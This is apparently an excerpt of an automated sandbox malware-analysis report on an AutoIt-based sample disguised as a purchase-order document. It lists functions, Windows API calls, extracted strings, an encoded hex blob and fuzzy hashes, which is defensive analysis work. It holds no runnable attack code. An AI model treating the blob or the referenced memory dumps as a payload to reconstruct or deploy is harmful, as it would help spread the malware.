Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3f9e476ef45f889762b840d682d2d264a9b8c80951358764e0511bd22aac0a
Instruction ID: 579f48a34205f4943f764b5e11bcb6a5cf0a7ac56d41965876cecde91d000803
Opcode Fuzzy Hash: 8b3f9e476ef45f889762b840d682d2d264a9b8c80951358764e0511bd22aac0a
Instruction Fuzzy Hash: 90616B7120870996DE38AA6C8DA5BBE6394DF5170CF280A1AEC43DB2C1DB51DE72C355

Function 00167CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a299346b93be792ab894417f6b6ab3247a807926a604443819ce23323bae6b
Instruction ID: 6b1ecc3f5881b5b7d08e7104dc6a4f92939a77eda4f80554cbf9e1eda6b36339
Opcode Fuzzy Hash: 61a299346b93be792ab894417f6b6ab3247a807926a604443819ce23323bae6b
Instruction Fuzzy Hash: CD61993120870966DF399EA89C91BBF2384EF5274CF200D5AE943CB2C1EB129D76C311

Function 00F4DF50 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: f7e8e3667ef77b23a92df031b5a3f245e2b83c98e9a9be5e25235e7308fc8bef
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: FE41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 00F4DDE0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: c7bfd97aaba13cd02979c55bbc00ab599cb70a725e4559ccc256cd96c75e501a
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: D0018079A00109EFCB44DF98C5909AEFBB5FB58310F208599ED09AB301D730AE41EB80

Function 00F4DE40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: d268271d27e7fcc5fb22ec4abec7df53581880646495dea06a1b6ca8fb620dd5
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 5A019279E01109EFCB44DF98C5909AEFBB5FB58310F208599ED09AB301D730AE51EB80

Function 00F4C7D0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 001C2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001C2B30
DeleteObject.GDI32(00000000), ref: 001C2B43
DestroyWindow.USER32 ref: 001C2B52
GetDesktopWindow.USER32 ref: 001C2B6D
GetWindowRect.USER32(00000000), ref: 001C2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001C2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001C2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2CF8
GetClientRect.USER32(00000000,?), ref: 001C2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001C2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D80
GlobalLock.KERNEL32(00000000), ref: 001C2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D98
GlobalUnlock.KERNEL32(00000000), ref: 001C2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2DA8
GlobalFree.KERNEL32(00000000), ref: 001C2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,001DFC38,00000000), ref: 001C2DDB
GlobalFree.KERNEL32(00000000), ref: 001C2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001C2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001C2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C303F

Strings

static, xrefs: 001C2D3A, 001C2E91
DISPLAY, xrefs: 001C2EA2
AutoIt v3, xrefs: 001C2CF2
, xrefs: 001C2FC5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8146bf7c11a5c19e0220cf7c8a80cb2381445aac4a34373ab09afd608f0a5e0d
Instruction ID: 6b11f97b9be6f70c9187a0a5c41605fae505077e6a5bd8de4dea5317da30caa0
Opcode Fuzzy Hash: 8146bf7c11a5c19e0220cf7c8a80cb2381445aac4a34373ab09afd608f0a5e0d
Instruction Fuzzy Hash: 87027C71901219EFDB14DF64DC89FAEBBB9EB58310F008559F915AB2A1CB70ED41CBA0

Function 001D70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 001D712F
GetSysColorBrush.USER32(0000000F), ref: 001D7160
GetSysColor.USER32(0000000F), ref: 001D716C
SetBkColor.GDI32(?,000000FF), ref: 001D7186
SelectObject.GDI32(?,?), ref: 001D7195
InflateRect.USER32(?,000000FF,000000FF), ref: 001D71C0
GetSysColor.USER32(00000010), ref: 001D71C8
CreateSolidBrush.GDI32(00000000), ref: 001D71CF
FrameRect.USER32(?,?,00000000), ref: 001D71DE
DeleteObject.GDI32(00000000), ref: 001D71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 001D7230
FillRect.USER32(?,?,?), ref: 001D7262
GetWindowLongW.USER32(?,000000F0), ref: 001D7284

Part of subcall function 001D73E8: GetSysColor.USER32(00000012), ref: 001D7421
Part of subcall function 001D73E8: SetTextColor.GDI32(?,?), ref: 001D7425
Part of subcall function 001D73E8: GetSysColorBrush.USER32(0000000F), ref: 001D743B
Part of subcall function 001D73E8: GetSysColor.USER32(0000000F), ref: 001D7446
Part of subcall function 001D73E8: GetSysColor.USER32(00000011), ref: 001D7463
Part of subcall function 001D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001D7471
Part of subcall function 001D73E8: SelectObject.GDI32(?,00000000), ref: 001D7482
Part of subcall function 001D73E8: SetBkColor.GDI32(?,00000000), ref: 001D748B
Part of subcall function 001D73E8: SelectObject.GDI32(?,?), ref: 001D7498
Part of subcall function 001D73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001D74B7
Part of subcall function 001D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001D74CE
Part of subcall function 001D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001D74DB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 3090c3ee388b60a910fa22f11e1470cc4368973ccef940a2d7e68b8235477112
Instruction ID: 6ef2aa0c0fe5f2ee0fdb3bdc05e4841a27ddfd5486aaa62378ea042723fbc2c2
Opcode Fuzzy Hash: 3090c3ee388b60a910fa22f11e1470cc4368973ccef940a2d7e68b8235477112
Instruction Fuzzy Hash: 2BA1947210A312FFDB009F60DC48A5BB7A9FB49321F100F1AF962961E1D771E944CB91

Function 001C2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 001C273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001C286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001C28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001C28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001C2900
GetClientRect.USER32(00000000,?), ref: 001C290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001C2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001C2964
GetStockObject.GDI32(00000011), ref: 001C2974
SelectObject.GDI32(00000000,00000000), ref: 001C2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001C2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001C2991
DeleteDC.GDI32(00000000), ref: 001C299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001C29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 001C29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001C2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001C2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 001C2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001C2A77
GetStockObject.GDI32(00000011), ref: 001C2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001C2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001C2A97

Strings

static, xrefs: 001C294F, 001C2A71
DISPLAY, xrefs: 001C295A
AutoIt v3, xrefs: 001C28F8
msctls_progress32, xrefs: 001C2A13

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 41e491f1f23630f45ea3f38a4fce2cce568c25db581805a047b51d25abf2ea41
Instruction ID: 6b40c7f923c8513d05b0b77fdbd53e3d421a92608f4f94f4dc54e451b65dec1c
Opcode Fuzzy Hash: 41e491f1f23630f45ea3f38a4fce2cce568c25db581805a047b51d25abf2ea41
Instruction Fuzzy Hash: 61B16071A01215AFDB14DF68DC89FAEBBA9EF14710F008559FA14EB2A0DB70ED40CB90

Function 001B4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001B4AED
GetDriveTypeW.KERNEL32(?,001DCB68,?,\\.\,001DCC08), ref: 001B4BCA
SetErrorMode.KERNEL32(00000000,001DCB68,?,\\.\,001DCC08), ref: 001B4D36

Strings

Removable, xrefs: 001B4C10, 001B4C15
ATAPI, xrefs: 001B4C91
FileBackedVirtual, xrefs: 001B4CEC
SAS, xrefs: 001B4CC9
Virtual, xrefs: 001B4CE5
PhysicalDrive, xrefs: 001B4B76
SSD, xrefs: 001B4C4A
RAMDisk, xrefs: 001B4BF4
iSCSI, xrefs: 001B4CC2
1394, xrefs: 001B4C9F
SSA, xrefs: 001B4CA6
SATA, xrefs: 001B4CD0
ATA, xrefs: 001B4C98
SCSI, xrefs: 001B4C8A
Unknown, xrefs: 001B4BED, 001B4C83
Network, xrefs: 001B4C02
Fibre, xrefs: 001B4CAD
MMC, xrefs: 001B4CDE
\\.\, xrefs: 001B4B3F
USB, xrefs: 001B4CB4
Fixed, xrefs: 001B4C09
CDROM, xrefs: 001B4BFB
RAID, xrefs: 001B4CBB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 93d13f64189eaa71577357b68fbf97b5143730804a25c3d802d37205c340bbb4
Instruction ID: 8f36e95d265733f882c9d82598a744b70a7ab5b0c9cf26ebc1a17f1aefc31118
Opcode Fuzzy Hash: 93d13f64189eaa71577357b68fbf97b5143730804a25c3d802d37205c340bbb4
Instruction Fuzzy Hash: 7561C330615206DBCB08EF64CA8A9FD7BB0EF15B00B24C416F806AB693DB31ED65DB41

Function 001D73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 001D7421
SetTextColor.GDI32(?,?), ref: 001D7425
GetSysColorBrush.USER32(0000000F), ref: 001D743B
GetSysColor.USER32(0000000F), ref: 001D7446
CreateSolidBrush.GDI32(?), ref: 001D744B
GetSysColor.USER32(00000011), ref: 001D7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 001D7471
SelectObject.GDI32(?,00000000), ref: 001D7482
SetBkColor.GDI32(?,00000000), ref: 001D748B
SelectObject.GDI32(?,?), ref: 001D7498
InflateRect.USER32(?,000000FF,000000FF), ref: 001D74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001D74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 001D74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001D7554
InflateRect.USER32(?,000000FD,000000FD), ref: 001D7572
DrawFocusRect.USER32(?,?), ref: 001D757D
GetSysColor.USER32(00000011), ref: 001D758E
SetTextColor.GDI32(?,00000000), ref: 001D7596
DrawTextW.USER32(?,001D70F5,000000FF,?,00000000), ref: 001D75A8
SelectObject.GDI32(?,?), ref: 001D75BF
DeleteObject.GDI32(?), ref: 001D75CA
SelectObject.GDI32(?,?), ref: 001D75D0
DeleteObject.GDI32(?), ref: 001D75D5
SetTextColor.GDI32(?,?), ref: 001D75DB
SetBkColor.GDI32(?,?), ref: 001D75E5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9152e5c9ec36657d95a7b12bc693331d68a70fbb6138488e39605f4f877dab61
Instruction ID: 81869771981bf9151ade3fe621ed14d87cfd55d82cc5476544baaa6953ef62eb
Opcode Fuzzy Hash: 9152e5c9ec36657d95a7b12bc693331d68a70fbb6138488e39605f4f877dab61
Instruction Fuzzy Hash: 1A615072902219EFDF019FA4DC49EEEBF79EB08320F114616F915AB2E1D7749980CB90

Function 001D0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001D1128
GetDesktopWindow.USER32 ref: 001D113D
GetWindowRect.USER32(00000000), ref: 001D1144
GetWindowLongW.USER32(?,000000F0), ref: 001D1199
DestroyWindow.USER32(?), ref: 001D11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001D11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001D121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 001D1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001D1245
IsWindowVisible.USER32(00000000), ref: 001D12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001D12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001D12D0
GetWindowRect.USER32(00000000,?), ref: 001D12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 001D130E
GetMonitorInfoW.USER32(00000000,?), ref: 001D1328
CopyRect.USER32(?,?), ref: 001D133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 001D13AA

Strings

(, xrefs: 001D131B
tooltips_class32, xrefs: 001D11E6
0, xrefs: 001D10D3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 1e97c4f3ab642458f38a2368b89293f7a85467963939a08af89323d7f44fd81f
Instruction ID: 68f16e45cac65653b4ca2b8b14b4896b52e81113ce647a93f8ffed85fa620009
Opcode Fuzzy Hash: 1e97c4f3ab642458f38a2368b89293f7a85467963939a08af89323d7f44fd81f
Instruction Fuzzy Hash: B9B16B71608341BFDB14DF64D884B6BBBE5FF98350F00891AF9999B2A1CB71E844CB91

Function 001D0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001D02E5
_wcslen.LIBCMT ref: 001D031F
_wcslen.LIBCMT ref: 001D0389
_wcslen.LIBCMT ref: 001D03F1
_wcslen.LIBCMT ref: 001D0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001D04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D0504

Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD

Part of subcall function 001A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A2258
Part of subcall function 001A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001A228A

Strings

SELECT, xrefs: 001D0548
ISSELECTED, xrefs: 001D04DD
DESELECT, xrefs: 001D059C
FINDITEM, xrefs: 001D0627
GETTEXT, xrefs: 001D03EC, 001D0407
SELECTINVERT, xrefs: 001D057E
VIEWCHANGE, xrefs: 001D0675
SELECTALL, xrefs: 001D0515
SELECTCLEAR, xrefs: 001D052D
GETSUBITEMCOUNT, xrefs: 001D0384, 001D039F
GETSELECTED, xrefs: 001D05E1
GETITEMCOUNT, xrefs: 001D0316, 001D0337
GETSELECTEDCOUNT, xrefs: 001D0470, 001D048B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 48860f35190414b9760058f6ea2d0f69d666a876ef397762bb64e166c86c723e
Instruction ID: 1ad9732f1e381611df20db7101d2ce20edf08bfdda120bfabfde680e92f66b8d
Opcode Fuzzy Hash: 48860f35190414b9760058f6ea2d0f69d666a876ef397762bb64e166c86c723e
Instruction Fuzzy Hash: 71E1AF316183019FC715DF28C590A2AB3E6BF9C314F15495EF8969B3A2DB30ED45CB91

Function 00158891 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00158968
GetSystemMetrics.USER32(00000007), ref: 00158970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0015899B
GetSystemMetrics.USER32(00000008), ref: 001589A3
GetSystemMetrics.USER32(00000004), ref: 001589C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001589E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001589F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00158A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00158A3C
GetClientRect.USER32(00000000,000000FF), ref: 00158A5A
GetStockObject.GDI32(00000011), ref: 00158A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00158A81

Part of subcall function 0015912D: GetCursorPos.USER32(?), ref: 00159141
Part of subcall function 0015912D: ScreenToClient.USER32(00000000,?), ref: 0015915E
Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000001), ref: 00159183
Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000002), ref: 0015919D

SetTimer.USER32(00000000,00000000,00000028,001590FC), ref: 00158AA8

Strings

406525561840652f5618406524561840652f561840652e561840652f561840652f561840652f561840652f56184065235618406523561840652c56184065295618, xrefs: 001967BA
AutoIt v3 GUI, xrefs: 00158A20

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

